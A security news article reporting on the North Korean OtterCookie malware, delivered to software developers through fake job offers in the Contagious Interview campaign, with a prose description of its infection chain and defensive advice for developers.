Beware Developers: New Malware Targets You in Fake Job Offers

2024-12-26

North Korean threat actors are on the prowl again, this time using a new malware called OtterCookie to target software developers through a campaign known as Contagious Interview. This campaign has been ongoing since at least December 2022 and leverages fake job offers to trick developers into downloading malware.

Contagious Interview Evolves with New Malware

Researchers at Palo Alto Networks first discovered the Contagious Interview campaign in December 2022. The campaign used fake job offers to deliver malware like BeaverTail and InvisibleFerret. Now, a new report from NTT Security Japan reveals that the attackers have added a new weapon to their arsenal: OtterCookie.

OtterCookie first appeared in September 2024, with a new variant emerging in November. The malware is delivered through a loader that fetches JSON data and executes a specific property (“cookie”) as JavaScript code.

Infection Chain and Capabilities

Similar to previous iterations of the Contagious Interview campaign, OtterCookie targets software developers through infected Node.js projects, npm packages downloaded from repositories like GitHub or Bitbucket, and even Qt or Electron applications.

Once installed, OtterCookie establishes secure communication with its command and control (C2) server using Socket.IO and awaits instructions. The researchers observed commands designed to steal valuable information from the target device, including cryptocurrency wallet keys, documents, images, and clipboard data.

The September variant of OtterCookie included built-in functionality to search for Ethereum private keys using regular expressions. This functionality was replaced with remote shell commands in the November variant, indicating the attackers’ evolving tactics.

What Undercode Says: Analyzing the Threat

The emergence of OtterCookie and the diversification of infection methods employed in the Contagious Interview campaign highlight several critical points for software developers:

Increased Threat Landscape: This campaign underscores the growing sophistication of cyberattacks targeting developers. Developers are increasingly seen as a gateway to sensitive information and systems.
Social Engineering Tactics: The use of fake job offers demonstrates the effectiveness of social engineering tactics in luring developers into compromising their machines.
Code Security Awareness: Developers need to be vigilant about the code they download and run, especially from untrusted sources. Employers should also avoid requesting coding tests that involve running code on personal devices.
Multi-Layered Defense: A comprehensive security strategy that includes code scanning, endpoint protection, and security awareness training is essential to mitigate these evolving threats.

Conclusion

The Contagious Interview campaign serves as a stark reminder of the constant need for vigilance among software developers. By staying informed about the latest threats, adopting secure coding practices, and remaining cautious of unsolicited job offers, developers can help protect themselves and their organizations from these sophisticated attacks.